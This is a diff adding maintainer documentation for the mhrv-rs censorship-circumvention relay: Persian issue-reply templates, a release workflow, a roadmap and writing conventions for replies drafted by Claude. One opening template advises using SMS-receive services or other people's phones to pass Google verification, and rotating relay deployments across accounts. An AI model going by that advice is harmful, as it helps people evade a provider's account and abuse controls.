consequences scope-شده به Apps Script + UrlFetchApp quota — نه Gmail یا Drive یا سایر Google services. accounts با history regular usage (Gmail, Drive files، etc.) و age چند سال + در low-risk قرار دارند برای personal CodeFull.gs deployment. + +**workarounds:** + +**۱. بهترین: phone اضافه کنید.** + +Iranian phone گاهی filter می‌شه، ولی می‌توانید: + +- phone یک friend/family member outside Iran استفاده کنید (SMS code رو forward کنند) +- TextNow / Google Voice (US) / paid SMS-receive services +- بعضی موارد Google یک phone رو روی چند account قبول می‌کنه (~۵ account per phone limit) + +**۲. اگر phone نمی‌توانید:** + +accounts احتمالاً به Stage 2-3 progress می‌کنن طی روزها-تا-هفته. 
برای حفظ service: + +- deployments جدید زیر accounts متفاوت بسازید قبل از اینکه old fail کنه +- از **community shared deployment** workflow ([#325](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/325)) استفاده کنید — friend با account stable deployment می‌سازه + ID share می‌کنه + AUTH_KEY مشترک + +**۳. برای access به script.google.com وقتی شبکه slow:** + +می‌توانید از **mhrv-rs خود** برای access به script.google.com استفاده کنید. mhrv-rs's HTTP proxy به browser → CONNECT tunneling به Google عمل می‌کنه (نه UrlFetchApp.fetch — که Google block می‌کنه). browser رو با proxy `127.0.0.1:8086` تنظیم کنید + بروید script.google.com. + +**Action item:** + +اگر Stage 1a هستید (notification ولی deployments هنوز کار می‌کنن): فوراً phone verify کنید. + +اگر Stage 1b هستید (deployments شروع به Workspace HTML برمی‌گردونن): همان، plus rotation deployment‌ها به accounts سالم. + +--- +[reply via Anthropic Claude | reviewed by @therealaleph] +``` + +## Template 6: Architectural limit (Google services + UrlFetchApp self-loop) + +For users asking why `cloud.google.com` / `colab` / `gmail` / `meet` / `gemini` doesn't work: + +```markdown +این محدودیت **architectural** است + ربطی به config یا setup شما نداره. + +**Apps Script's UrlFetchApp self-loop restriction:** + +`UrlFetchApp.fetch()` Google در API hardcoded ساخته که نمی‌تونه به دامنه‌های `*.google.com` / `*.googleapis.com` / `*.gstatic.com` request بفرسته. Apps Script یا empty response می‌ده یا 4xx/5xx error. + +این محدودیت **Google ست** (نه implementation ما) + در Apps Script API documentation هم ذکر شده. هیچ HTTP-relay مبتنی بر Apps Script نمی‌تونه به Google services از Apps Script→Google path برسه. 
+ +**سایت‌های متأثر:** + +- `cloud.google.com` — Console +- `colab.research.google.com` — Colab +- `gemini.google.com` — Gemini chat +- `drive.google.com` — Drive +- `docs.google.com` / `sheets.google.com` / `slides.google.com` — Workspace +- `meet.google.com` — Meet (Web) +- `mail.google.com` — Gmail +- `script.google.com/home/usage` — Apps Script dashboard +- `*.google.com` به‌طور کلی + +**راه‌حل‌ها:** + +**۱. سایت‌های alternative:** + +- به‌جای Drive: WebDAV / Mega / Cloudflare R2 +- به‌جای Colab: Kaggle Notebooks / Jupyter Lab روی VPS +- به‌جای Gemini: ChatGPT (openai.com) / Claude (claude.ai) — اگر CF block نشدن، کار می‌کنن +- به‌جای Cloud Console: SSH مستقیم یا cloud provider's CLI + +**۲. Full mode + VPS:** + +VPS از طرف خود به Google direct وصل می‌شه. در Full mode، traffic Google رو می‌توانید با xray dual-routing از mhrv-rs bypass کنید. detail در [#420](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/420). با این setup همه‌ی Google services از طریق VPS direct کار می‌کنن. + +**۳. temp VPN موقت:** + +برای access گاه‌گاهی به Google services (مثلاً برای download فایل از Drive یا setup OAuth)، یک VPN موقت ۱۰ دقیقه‌ای استفاده کنید + سپس به mhrv-rs برمی‌گردید. + +**نتیجه:** + +اگر می‌خواهید سایت‌های Google کار کنن با همان setup mhrv-rs که الان دارید، نیاز به Full mode + VPS + xray routing است. تا وقتی فقط apps_script mode دارید، Google services unreachable می‌مونن. 
+ +--- +[reply via Anthropic Claude | reviewed by @therealaleph] +``` + +## Common Persian phrases for inline use + +When writing custom replies, these phrases come up frequently and should be standardized: + +| Concept | Persian phrasing | +|---------|------------------| +| "redeploy as new version" | `redeploy as new version کنید (نه head)` | +| "exact match" | `دقیقاً match کنه` / `exact match` | +| "case-sensitive" | `case-sensitive است` | +| "ISP throttle" | `ISP throttle` (English term, transliterate not used) | +| "narrow down" | `narrow کنیم` | +| "share the log" | `log رو share کنید` | +| "thanks for the report" | `ممنون از گزارش` / `تشکر از گزارش` | +| "I owe you" / "apologies" | `معذرت می‌خوام بابت` | +| "for your specific case" | `برای case خاص شما` | +| "unfortunately" | `متأسفانه` | +| "the workaround is" | `workaround این هست که...` | +| "this is a known issue" | `این مشکل شناخته شده است` | +| "feature is queued" | `feature در roadmap است` | +| "we'll ship in v1.x.y" | `در v1.x.y ship می‌شه` | +| "configuration file" | `فایل config` | +| "command line" | `command line` / `terminal` / `ترمینال` | +| "deployment" (Apps Script) | `deployment` (transliterated `دپلوی` is not used in this project) | +| "tunnel" (Full mode) | `tunnel` | +| "browser" | `browser` / `مرورگر` | +| "system proxy" | `system proxy` | +| "page loads but X doesn't work" | `page بالا میاد ولی X کار نمی‌کنه` | +| "I tested with curl" | `با curl تست کردم` | +| "the bug is fixed in vX.Y.Z" | `bug در vX.Y.Z حل شده` | +| "thanks for catching this" | `ممنون از catch کردن این` | +| "let me know if it works" | `اگر کار کرد گزارش بدید` | +| "if it fails again, share the log" | `اگر دوباره fail کرد، log رو share کنید` | + +These let Persian replies use English technical terms naturally without forced transliteration, which matches how Iranian developers actually talk. 
diff --git a/docs/maintainer/references/release-workflow.md b/docs/maintainer/references/release-workflow.md new file mode 100644 index 00000000..7e5b0698 --- /dev/null +++ b/docs/maintainer/references/release-workflow.md @@ -0,0 +1,211 @@ +# Release workflow + +Cutting a release is fast and low-ceremony for this project. Most releases are patch bumps that go from "decision to ship" to "Telegram channel posting" in under 30 minutes of human work + ~30 minutes of CI. + +## When to cut a release + +Cut a release whenever **anything user-visible** has landed since the last tag. User-visible includes: + +- Bug fixes that affect runtime behavior +- New config options +- New CLI subcommands or flags +- Diagnostic improvements (better log messages, error categories) +- Apps Script script changes (Code.gs / CodeFull.gs) +- Documentation that users will read (README updates, troubleshooting docs — though these can also batch into the next release) + +Don't cut for: +- Internal refactors with no behavior change +- CI/workflow file edits +- Markdown formatting fixes +- Test-only changes + +When in doubt, cut. Patch releases are cheap and Iranian users actively check the Telegram channel for updates. + +## The release workflow + +### Step 1: Decide the version + +Read the latest tag: + +```bash +git describe --tags --abbrev=0 +``` + +Then bump: +- **Patch (Z+1)** — for ~95% of releases. v1.8.2 → v1.8.3 +- **Minor (Y+1)** — for a coherent feature batch shipped together. v1.7.x → v1.8.0 represented "DPI evasion + active-probing defense + full-mode usage counters" together +- **Major (X+1)** — never done in this project's history. Reserved for true protocol-incompatible changes with the Apps Script side. Don't bump major without explicit go-ahead. + +### Step 2: Bump `Cargo.toml` + +Edit `Cargo.toml` line 3 (`version = "X.Y.Z"`). Keep package name `mhrv-rs` unchanged. 
The `tunnel-node` subcrate has its own version that's independent — don't bump it unless you're shipping a tunnel-node change. + +### Step 3: Build to refresh `Cargo.lock` + +```bash +cargo build --release 2>&1 | tail -3 +``` + +`Cargo.lock` will pick up the new version string. Verify with: + +```bash +git diff Cargo.lock | head -20 +``` + +Should show only the `name = "mhrv-rs"` block's `version = "X.Y.Z"` change. + +### Step 4: Write the changelog + +Create `docs/changelog/vX.Y.Z.md` using the format in `assets/changelog-template.md`. Persian first, then `---`, then English. See `workflow-conventions.md` for format details. + +When the release is shipping multiple PRs from contributors, credit each by name + handle in both halves of the changelog. + +### Step 5: Run tests + final build + +```bash +cargo test --lib 2>&1 | tail -5 +cargo build --release 2>&1 | tail -3 +cargo build --bin mhrv-rs-ui --release --features ui 2>&1 | tail -3 +``` + +All three must succeed. Test count varies by version. All passing is the gate. + +If any contributor PRs were merged in this release, also verify by re-running tests after the merge — sometimes integration with main reveals issues that didn't show in the PR's CI. + +### Step 6: Commit + tag + push + +```bash +git add Cargo.toml Cargo.lock docs/changelog/vX.Y.Z.md +git status # sanity check +git commit -m "$(cat <<'EOF' +chore: vX.Y.Z — + + +EOF +)" + +git push origin main +git tag vX.Y.Z +git push origin vX.Y.Z +``` + +The `git push origin vX.Y.Z` is the trigger — release CI auto-fires on tag push. 
+
+If `git push origin main` fails with `non-fast-forward`, someone (often the auto-binary-refresh CI from a prior release) pushed in the meantime:
+
+```bash
+git pull --rebase origin main
+git push origin main
+git tag vX.Y.Z   # if you didn't tag yet
+git push origin vX.Y.Z
+```
+
+If you already tagged before the push race, re-check the tag after rebasing: `git pull --rebase` gives your commit a new parent, which changes its SHA even when there are no conflicts, so the existing tag would point at the pre-rebase commit (no longer on main). Delete and re-create the tag before pushing it (`git tag -d vX.Y.Z && git tag vX.Y.Z`). Only if the rebase was a no-op (nothing new was actually pulled) does your commit's SHA — and therefore the tag — stay valid as-is.
+
+### Step 7: Watch CI
+
+```bash
+gh run list --limit 3
+```
+
+Two workflows fire on tag push:
+1. **`release-drafter`** — quick (~15s), updates the GitHub release draft. Always succeeds.
+2. **`release`** — slow (~25-35 minutes), builds binaries for all platforms, attaches to release.
+
+Once `release` succeeds, a third workflow auto-fires:
+3. **`Telegram publish release files`** — posts each binary individually to the Telegram channel `mhrv_rs` with Persian captions, SHA-256 hashes, and a cross-link from the main channel. Takes ~1-2 minutes.
+
+If `release` fails, common causes:
+
+- **Cross-compile failure** — particularly on i686 / mipsel. i686 was dropped from the matrix in v1.7.11 because of MSRV churn (see #411 thread). If a new architecture starts failing, it's usually a transitive dep bumping MSRV past what the toolchain pinned for that target supports. Triage: check which architecture's job failed, look at the cargo error, decide whether to pin a dep with `cargo update --precise` or drop the architecture.
+- **`actions/download-artifact@v4` flakiness** — replaced with `gh run download` + 3-attempt retry in v1.7.11. Should be stable now; if it flakes again, increase retry count.
+
+After CI succeeds, optionally check the binary refresh:
+
+```bash
+git pull origin main
+git log --oneline -3
+```
+
+You should see an auto-generated commit `chore(releases): refresh prebuilt binaries for vX.Y.Z` from the release CI bot.
+ +### Step 8: Verify Telegram channel + +The Telegram publish workflow posts to channel `mhrv_rs` (public link `https://t.me/mhrv_rs`). The channel should show: + +1. An announcement post: `📦 mhrv-rs vX.Y.Z منتشر شد...` referencing the changelog file +2. ~16 individual file posts (Android APKs split by ABI, Windows ZIP, macOS arm64/amd64 dmg+tar, Linux x86_64/arm64 incl. musl, Raspbian, OpenWRT) +3. Each file caption includes Persian description (e.g., "نسخه ویندوز x86") + SHA-256 hash +4. A "main channel" post (different channel) cross-linking to the files channel post + +Files larger than 50 MB get chunked into `.part_aa`, `.part_ab`, etc. via the `split` pattern in `.github/scripts/telegram_publish_files.py`. + +If something didn't post, check the workflow run logs: + +```bash +gh run view --log +``` + +Common cause: the auto-fire dispatch on `workflow_run` requires the parent workflow to succeed; if release.yml had a flaky download retry, the dispatch might still succeed but partial. + +## Manual re-publish (rare) + +If you need to re-trigger Telegram publishing for an already-released version (e.g., the workflow failed and you fixed it), use `workflow_dispatch`: + +```bash +gh workflow run "Telegram publish release files" -f version=vX.Y.Z +``` + +The script downloads artifacts via `gh release download` (not the workflow's artifacts) so it works retroactively. + +## Re-cutting a release (very rare) + +If a release was tagged and pushed but turns out to be broken (e.g., bug in a merged PR you wanted to revert): + +1. **Don't** delete the tag if the release is already public. Iranian users may have already pulled the binaries; a deleted tag confuses them and they think the project is gone. +2. Cut a fix immediately as the next patch (vX.Y.Z+1). +3. Optionally edit the GitHub release notes for the broken version to say "known issue, upgrade to vX.Y.Z+1". 
+ +If you tagged but didn't push yet, just delete the tag locally and re-tag after fixing: + +```bash +git tag -d vX.Y.Z # local only; safe +# fix the issue, commit +git tag vX.Y.Z +git push origin vX.Y.Z +``` + +## Pre-release rollback + +If `cargo test --lib` fails after merging PRs but before tagging: + +1. Don't tag. +2. Either revert the merge commit (`git revert `) or fix forward (commit a new fix on main). +3. Re-run tests until green. +4. Tag. + +The release CI doesn't run tests before building, so untagged-but-broken main is fine — you have time to fix before tagging. + +## Coordinating with multiple PRs in flight + +If two PRs are both ready to merge, the order matters: + +- Merge them one at a time (not both into a single tag) **only** if they're independent +- If they touch the same files, merge them sequentially with `gh pr checkout N1 && cargo test && merge`, then `gh pr checkout N2` (which now bases on the new main; CI on the PR may show the old base, but the local checkout sees latest main) `&& cargo test && merge` +- If a merge introduces conflicts, GitHub's UI flags the PR as conflicting; resolve via `gh pr checkout N` + manual rebase + push to the PR branch + +After all PRs are merged, **then** bump version, write changelog (covering all merged PRs), tag, push. + +## Versioning the tunnel-node subcrate + +`tunnel-node/Cargo.toml` has its own version field separate from the main crate. Bump it when: + +- Changing the tunnel-node HTTP API (`/tunnel`, `/batch` endpoints) +- Changing the auth flow (`TUNNEL_AUTH_KEY` semantics) +- Changing the env var contract +- Bumping the Docker image label + +For pure internal refactors of tunnel-node that don't change the surface, leave it alone — the Docker image at `ghcr.io/therealaleph/mhrv-tunnel-node:latest` continues to be the latest tag and users don't need to know an internal version bumped. + +When tunnel-node version bumps, the Docker image gets re-tagged in the registry by the CI. 
Users running `docker pull ghcr.io/therealaleph/mhrv-tunnel-node:latest` get the new version automatically; users pinned to a specific version stay pinned. diff --git a/docs/maintainer/references/roadmap.md b/docs/maintainer/references/roadmap.md new file mode 100644 index 00000000..5a1482bd --- /dev/null +++ b/docs/maintainer/references/roadmap.md @@ -0,0 +1,118 @@ +# Roadmap + +This is the project's queued work, organized by release batch. Use it when: +- Categorizing a new feature request from a user (which batch does this fit?) +- Cross-referencing roadmap items in your replies ("queued for v1.8.x") +- Deciding what to ship in the current batch vs deferred + +Update this file when items ship (move to "shipped") or when new items are added (cluster with similar items in the right batch). + +## v1.8.x (current batch — small fixes + diagnostics + Android UI) + +The v1.8.x line is a **small-and-frequent** release pattern. Each release ships one or two completed items rather than batching many. The theme is "diagnostic improvements + Android UX + Apps Script script enhancements". 
+ +### Shipped + +- ✅ **v1.8.0**: Random padding (DPI evasion), auto-blacklist deployments, decoy responses, full-mode usage counters, active-probing defense, DIAGNOSTIC_MODE flag in Code.gs +- ✅ **v1.8.1**: Decoy detection client-side (with v1.8.2/v1.8.3 corrections), `script_id` in error logs, `disable_padding` config flag +- ✅ **v1.8.2**: UI binary tracing reads `config.log_level` (with reload handle for live changes), softer 4-cause decoy detection error message +- ✅ **v1.8.3**: Spreadsheet-backed response cache (Code.gs, opt-in), DoH bypass for known DoH endpoints, H1 container keepalive (240s), 64 KB header cap with HTTP 431, clearer port-collision error message + +### Queued (small, can ship in next 1-3 patch releases) + +- **v1.8.4 candidate items**: + - Soften decoy detection further with the 6-cause taxonomy (Persian quota body + Workspace landing HTML detection) + - Per-`script_id` rolling-window error-category counter visible in CLI/UI + - run.bat auto-fallback to CLI when both UI renderers fail (#417 / #426) + - TUNNEL_AUTH_KEY startup warning when `MHRV_AUTH_KEY` is set without `TUNNEL_AUTH_KEY` (catches the recurring #391-style env var typo) + - Range-aware splicing in Code.gs (lets large downloads work via HTTP Range requests, partial fix for #441) + +### Queued (medium-effort, batch into focused release) + +- **`googlevideo_ip` config field** (#300) — separate `google_ip` for googlevideo.com vs other Google domains. Some users have one IP that works for the latter but not the former. Approx 1-2 days of work. +- **DNS ad-blocking via StevenBlack/hosts** (#377) — opt-in DNS-level filtering during SOCKS5/MITM dispatch. Reduces upstream calls for ad-domains. +- **DNS caching + parallel dispatch via hickory-resolver** (#377) — replace blocking DNS with cached + parallel resolver. Substantial latency win for browser pageloads. 
+- **Tunable strike-counter threshold for auto-blacklist** (#391) — single-deployment users currently hit the auto-blacklist after a few transient errors and end up with no working deployment. Make threshold configurable. +- **`block_quic` 3-state UI toggle** (#361 / #377): off / drop / reject (default reject = ICMP unreachable, instant Happy Eyeballs failover). 2bemoji's design. +- **Android UI batch** (#285 / #361 / #261 / #295 / #254 / #313 / #375): + - block_quic toggle + - youtube_via_relay toggle + - listen_host editor + - passthrough_hosts editor + - Active deployment indicator + - Per-deployment quota counters + - Android disconnect crash fix (#418) +- **System proxy toggle** (#432) — Windows/macOS/Linux desktop UI: on Connect set system HTTP proxy to mhrv-rs, on Disconnect clear. With crash-rollback so a hung mhrv-rs doesn't leave system proxy stuck. +- **`script_ids_url` dynamic config** (#433) — config field pointing at an HTTPS URL that returns a JSON list of deployment IDs. mhrv-rs fetches at startup + every TTL. Lets distributors update deployment lists for many users without each editing config manually. +- **In-app updater via mhrv-rs's own proxy** (#366) — let mhrv-rs check for updates + download new binaries through its own relay (avoiding the chicken-and-egg of "I can't reach github.com to update mhrv-rs"). Defense in depth. +- **Temporal jitter** (#369 §2) — randomize timing of batch dispatches to defeat timing-correlation DPI. +- **`tls_verify` config** (#430 / masterking32 PR #26) — opt-in to skip upstream TLS verification for self-signed certs. Trade-off: opens MITM-of-MITM risk; needs careful design. +- **`request_timeout` configurable** (#430 / masterking32 PR #25) — currently hard-coded `BATCH_TIMEOUT = 30s`. Make configurable for users on slow networks who want longer timeouts. +- **CF Workers backend audit** (#380 / #393) — test mhr-cfw compatibility. If it works, document as alternative backend. 
+ +### Documentation queued + +- **`docs/full-mode-google-bypass.md`** (#420) — dual-routing in xray for users with Iranian VPS xray entry topology +- **`docs/full-mode-iran-vps-setup.md`** (#420) — full step-by-step for the dual-VPS topology (Iranian xray entry + non-Iranian tunnel-node exit) +- **`docs/iran-mirrors.md`** (#422) — community-maintained Iranian CDN mirrors for users who can't reach github.com. Pending SHA-256 verification of @amintoorchi's xdevteam.liara.space mirrors. +- **`docs/win7-build.md`** (#411) — manual Cargo.lock downgrade + cargo update --precise chain for community Win7 32-bit builds. Officially unsupported since v1.7.11 but the build path works for technical users. +- **`docs/faq/android.md`** — user trust store explanation, which apps work, why Gmail/YouTube don't, root + Magisk option +- **Updates to README** — short explanation of dual-routing for Google services + xray config snippet + +## v1.9.0 (headline release — xmux) + +The v1.9.0 release is the **xmux** feature: stream splitting across multiple Apps Script deployments at byte-range level. Currently in design / RFC stage (#369). + +### Design goals + +- **Survivability under ISP RST** — when one deployment's TCP connection gets RST-injected mid-stream, other deployments continue to carry remaining byte ranges +- **Latency reduction** — small responses can hit any of N deployments first; mhrv-rs takes the first to respond +- **Bandwidth aggregation** — large downloads chunk across deployments concurrently. 5 deployments × 10 MB/s each ≈ 50 MB/s aggregate (subject to per-deployment caps) +- **SABR cliff mitigation** — long YouTube streams chunk into <30s windows across deployments; each window finishes within Apps Script's response cap, then mhrv-rs reassembles + +### Open design questions + +- **Reordering buffer size** — bigger = more memory; smaller = more retries on out-of-order +- **Failure recovery** — if a deployment fails mid-chunk, who picks up the half-served range? 
+- **Idempotency** — POST requests are tricky; current design only handles GET safely +- **State consistency** — if some chunks come from cache and some don't, ETag/Last-Modified handling needs care +- **Configurability** — when does a user want xmux on (latency-sensitive) vs off (quota-sensitive)? + +### Implementation timeline + +- 4-6 weeks of design + implementation +- Tag @w0l4i, @2bemoji, @ipvsami, @dazzling-no-more, @euvel as core reviewers when design issue is filed + +The design issue should be filed after the v1.8.x batch settles (so the queue isn't too long). + +## v1.9.x and beyond (longer-horizon) + +These are committed to the project's roadmap but not actively in design. Listed for traceability when users ask "are you planning X?". + +- **Cloudflare WARP integration** (#309) — outbound traffic exits via Cloudflare WARP after Apps Script. Lets sites that flag Google IPs (most CF-protected) see traffic as Cloudflare-residential. Feasibility uncertain — needs CF account + WARP wireguard interface integration. +- **TLS fingerprint randomization** (#369 §2) — randomize JA3/JA4 across deployments. Defeats CF / commercial bot detection. +- **tunnel-node UPSTREAM_SOCKS5 chain** (#333 kanan-droid) — let tunnel-node forward through a SOCKS5 upstream (e.g., another VPN). Defense in depth + IP variety. +- **Tier-3 i686-win7-windows-msvc target** (#411) — Windows 7 32-bit support via tier-3 target with `-Z build-std`. Needs nightly Rust. Roadmap v1.9.x or v2.x. +- **Web frontend / dashboard** (#384) — landing page for the project. Low priority but recurring request. +- **In-app changelog viewer** — show changelog for new version inside mhrv-rs UI when an update is available (small UX polish). + +## How to use this when triaging issues + +When a feature request comes in: + +1. Match the request to an existing item in this list. If found, reply: "Queued for v1.8.x [or whichever batch]. ETA ~X weeks. See [#NNN](#) for the canonical thread." +2. 
If it's a duplicate of an existing roadmap item, close as duplicate of the canonical issue. +3. If it's a new request not on this list: + - Substantive feature: add to v1.8.x or v1.9.x list as appropriate, note the issue number, reply with the planned bucket + - Long-horizon / uncertain: add to v1.9.x and beyond, reply that it's noted but no timeline + - Architectural impossibility (UrlFetchApp self-loop, MTProto, etc.): close with explanation, link to architectural reference + +## Roadmap velocity + +The project ships v1.x.y patches frequently — typically 1-3 per week during active development. Minor (1.x) bumps happen every few months. v1.0 → v1.8 took ~12 months. So: + +- "v1.8.x ETA" usually means "next 1-2 weeks" for small items, "next 1-2 months" for big items +- "v1.9.0 ETA" usually means "next 2-3 months" +- "v1.9.x" or "v2.x" means "no specific timeline, but committed to consider" + +Be honest with users about timelines. Iranian users especially appreciate knowing whether to wait or pursue alternatives. diff --git a/docs/maintainer/references/workflow-conventions.md b/docs/maintainer/references/workflow-conventions.md new file mode 100644 index 00000000..f3c3ba89 --- /dev/null +++ b/docs/maintainer/references/workflow-conventions.md @@ -0,0 +1,174 @@ +# Workflow conventions + +These are the writing conventions, formatting rules, and tone guidelines for everything that goes into the public repo or out to users. Internalize these — they're applied to every issue reply, every commit message, every changelog, every PR description. + +## The reply marker + +Every substantive issue or PR comment ends with this exact footer: + +``` +--- +[reply via Anthropic Claude | reviewed by @therealaleph] +``` + +That's a literal Markdown horizontal rule, then the `...` line. The `[reply via Anthropic Claude | reviewed by @therealaleph]` text is verbatim — same brackets, same pipe, same case, same `@therealaleph` mention. 
+ +**Why this exists**: replies are drafted by Claude and reviewed by the maintainer before posting. The marker signals this to the user. Users in this community know this convention and rely on it. + +**Don't omit it**, don't translate "reviewed by" into Persian, don't paraphrase the format. The marker stays the same regardless of whether the rest of the reply is in Persian or English. + +**Where it doesn't go**: very short comments like "Dup of #423." or "Closing as resolved." or close-comments via `gh issue close --comment "..."`. The marker is for substantive replies. Trivial close comments don't need it. + +## Persian or English: match the user + +The repo's userbase is majority Persian-speaking. Writing in their language matters — both for clarity (technical context lands better) and for respect (assuming everyone wants English is wrong). + +**Match what the user wrote**: +- User wrote in Persian → reply in Persian +- User wrote in English → reply in English +- User wrote a mix → match the dominant language; if it's roughly even, prefer Persian since most mixed-language Iranian users default to Persian for nuance and English for technical terms + +**Things that always stay in original Latin form**, regardless of reply language: +- Code blocks (Rust, JSON, bash, JS — all stay as-is) +- Command-line examples (`gh issue close N`, `cargo build`, `docker run ...`) +- Technical identifiers: `AUTH_KEY`, `TUNNEL_AUTH_KEY`, `script_id`, `parallel_concurrency`, `disable_padding`, `tunnel_doh`, `bypass_doh_hosts`, `DIAGNOSTIC_MODE`, `passthrough_hosts`, `google_ip`, `mode: "full"` / `mode: "apps_script"` +- Filename references: `Code.gs`, `CodeFull.gs`, `config.json`, `tunnel-node`, `mhrv-rs.exe`, `MhrvVpnService.kt`, `domain_fronter.rs` +- URLs and links +- The reply marker +- Issue references like `#404`, `#313` +- HTTP status codes (`502`, `504`, `403`) + +**Don't**: +- Translate command names or function names +- Mix Persian text into code blocks (unless user did so 
in their own paste) +- Use machine-translation for the Persian — write it natively + +**Persian register**: write at "polite professional" level — `می‌فرمایید` over `می‌گی`, `لطفاً` (please), full pronouns when needed. Iranian Github users tend to write fairly formally; match that. Use Persian punctuation conventions: `،` (Persian comma), `؛` (Persian semicolon), `؟` (Persian question mark) — though comma in lists is acceptable as `،` or `,` per style preference. + +## Public artifact tone + +Anything that goes into the public repo — issue replies, PR comments, commit messages, PR descriptions, changelogs — is full prose, written warmly and clearly. Iranian users especially read carefully and brevity reads as cold or dismissive in this context. Use full sentences. Explain reasoning. Be patient. + +## Changelog format + +Every release has a file at `docs/changelog/vX.Y.Z.md`. The format is strict: + +```markdown + +• [bullet 1 in Persian, with markdown links to issue numbers] +• [bullet 2 in Persian] +• [bullet 3 in Persian] +--- +• [same bullet 1 in English, written natively, not machine-translated] +• [same bullet 2 in English] +• [same bullet 3 in English] +``` + +Conventions: + +- **Use `•` (U+2022 bullet)**, not `-` or `*`. The Persian half uses bullets because Markdown unordered lists don't render naturally with Persian RTL text in the GitHub Releases page. +- **Issue/PR links**: full GitHub URLs in markdown form: `[#404](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/404)`. Don't use bare `#404` in changelogs — they don't auto-link in the Persian section. +- **Same content both halves** — they cover the same bullets, in the same order. Not necessarily verbatim translation; the Persian is written for Persian readers and may use slightly different framing. +- **Length**: each bullet should describe what changed AND why it matters. 
"Added DoH bypass" is too thin; "DoH lookups now route around the Apps Script tunnel via plain TCP, saving the ~2s UrlFetchApp roundtrip per name without losing privacy (DoH is already encrypted)" is the right depth.
+- **Credit contributors**: if a PR landed from a community contributor, say so by name + handle. Persian: `از @euvel`. English: `by @euvel`.
+- **Backwards-incompatible changes**: rare for this project, but flag prominently if any. Add `**تغییر ناسازگار**` / `**Breaking change**` prefix.
+
+The starter template is at `assets/changelog-template.md`.
+
+## Commit messages
+
+Format:
+
+```
+<type>: vX.Y.Z — <short summary>
+
+<body explaining what shipped and why>
+
+[optional: bullet list of specific changes]
+```
+
+Types in regular use:
+- `feat:` — new feature, user-visible (most common)
+- `fix:` — bug fix
+- `chore(releases):` — auto-fired CI commit refreshing prebuilt binaries
+- `chore:` — version bump, dep update, etc.
+- `docs:` — documentation-only changes
+- `ci(workflow-name):` — workflow file changes
+- `feat(area):` — feature scoped to a specific subsystem (e.g., `feat(code.gs):`, `feat(drive):`)
+
+Example commit message:
+
+```
+feat: v1.8.3 — sheet cache + DoH bypass + H1 keepalive + 431 + clearer errors
+
+Three substantive PRs from contributors landed for this release:
+
+- #443 by @euvel: optional spreadsheet-backed response cache in Code.gs.
+  Implements all 5 review suggestions from the design discussion (#400):
+  TTL-aware caching, 35 KB body-size gate, header rewriting on hit,
+  circular buffer for O(1) writes, Vary-aware compound keys.
+
+- #439 by @dazzling-no-more: bypass Apps Script tunnel for known DoH
+  endpoints on TCP/443. Cloudflare/Google/Quad9/AdGuard/NextDNS/OpenDNS/
+  ...
+```
+
+Conventions:
+- **Subject line under 75 chars** (GitHub truncates longer)
+- **Body wrapped at ~75-80 chars** for terminal-readability
+- **PR-merge commits**: when merging PRs via `gh pr merge --merge`, use `--subject` and `--body` to write the merge commit.
Format is the same — type prefix, short summary, body explaining what shipped and credit. + +## Issue close reasons + +Always pass `--reason`: + +- `--reason completed` — the user's problem was resolved (their fix worked, or our fix shipped + they confirmed). For close comments, brief acknowledgement is fine; full marker not required. +- `--reason "not planned"` — duplicate, architectural limit, won't-fix, or stale and unrecoverable. Always link to the canonical thread when closing as duplicate. + +For close comments, always include the destination issue if duplicate: + +``` +gh issue close N --reason "not planned" --comment "Closing as duplicate of #420 — full discussion + workarounds there." +``` + +## File names for reply markdown + +Convention: write reply markdown to a temp file (e.g., `/tmp/r--.md`) before posting via `gh issue comment N --body-file `. + +Examples: +- `/tmp/r-404-quota.md` — reply to #404 about a quota observation +- `/tmp/r-414-decoy.md` — reply to #414 about the decoy body +- `/tmp/r-pr-merged.md` — generic "merged + included in vX.Y.Z" PR thank-you reply + +**Why use files instead of inline `--body`**: the inline `--body` argument runs through the shell, which interprets backticks (\`code\`) and `$()` substitutions. Issue replies frequently contain bash command examples with these patterns. The file approach sidesteps the quoting hell entirely. Use it by default. + +The exception is very short replies like `Dup of #423.` — those can use `--body "Dup of #423."` directly. + +## Tone + +- **Warm but technical**. Iranian users in particular often write apologetically ("sorry for using AI for the translation", "sorry to bother") — answer them as you'd want to be answered: with care, with technical depth, with explicit acknowledgment that their report is valuable. +- **Don't promise fixes you can't deliver**. The Iran ISP throttle is not something the project can fix; saying "we're working on it" is OK, "we'll fix it next release" is not. 
+- **Don't pretend certainty**. v1.8.1's over-confident "AUTH_KEY mismatch" message in the decoy detection cost trust with reporters who turned out to be hitting one of the other candidate causes. v1.8.2 + v1.8.3 are explicitly less assertive ("could be one of the following four/six causes...") because being honest about uncertainty is the better long-term move. +- **Acknowledge community contributions liberally**. When a contributor's report shaped a roadmap item, say so by name. When a PR lands, thank them in the merge commit + PR comment + changelog. The project runs on goodwill. +- **Don't apologize excessively** but do correct yourself when wrong. Iterating publicly through wrong hypotheses to a correct one is fine; doubling down on a wrong assertion is not. + +## Persian translation specifics + +When writing Persian replies: + +- **Half-spaces (ZWNJ — `‌`)** in compound words: `می‌خواهم` (not `میخواهم` or `می خواهم`), `نمی‌توانم` (not `نمیتوانم`) +- **Persian numerals**: optional but common in formal writing — `۲۰،۰۰۰` instead of `20,000`. Code/commands always Latin numerals. +- **English technical terms in Persian text**: leave them in Latin script with surrounding Persian particles. Example: `از طریق Apps Script روی Google` (not transliterated) +- **Quotation marks**: Persian uses `«...»` rather than `"..."` for prose. Code/commands use `"..."` regardless. +- **The reply marker stays in English** as established. Don't translate `reviewed by` to Persian. + +## DOPR cycle structure + +When triaging a batch of issues/PRs, work through them in this order: + +1. **Read everything first** — list PRs, list recently-updated issues, scan headlines. Don't reply to issue 1 before knowing what issues 2-15 contain. Often there are clusters that should be addressed together (e.g., five users all hit the v1.8.0 decoy on the same day). +2. **Triage by pattern** — match each issue to a pattern from `issue-patterns.md`. 
